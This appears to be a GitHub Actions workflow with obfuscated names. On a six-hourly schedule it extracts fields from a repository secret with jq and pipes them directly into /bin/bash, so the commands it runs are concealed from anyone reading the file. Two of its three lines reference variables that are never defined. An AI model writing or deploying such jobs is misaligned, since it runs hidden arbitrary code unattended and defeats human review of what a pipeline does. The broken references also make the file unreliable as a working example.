name: qijihuo2345

on:
  workflow_dispatch:
  schedule:
    - cron: '31 5/6 * * *'
jobs:  # 11187
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qijihuo2345
        env:
          wb669: ${{ secrets.wb669 }}
        run: |
          echo $wb669 | jq -r .ls64 | /bin/bash
          echo $vmo31854 | jq -r .ru43026 | /bin/bash
          echo $a0 | jq -r .kzz5 | /bin/bash

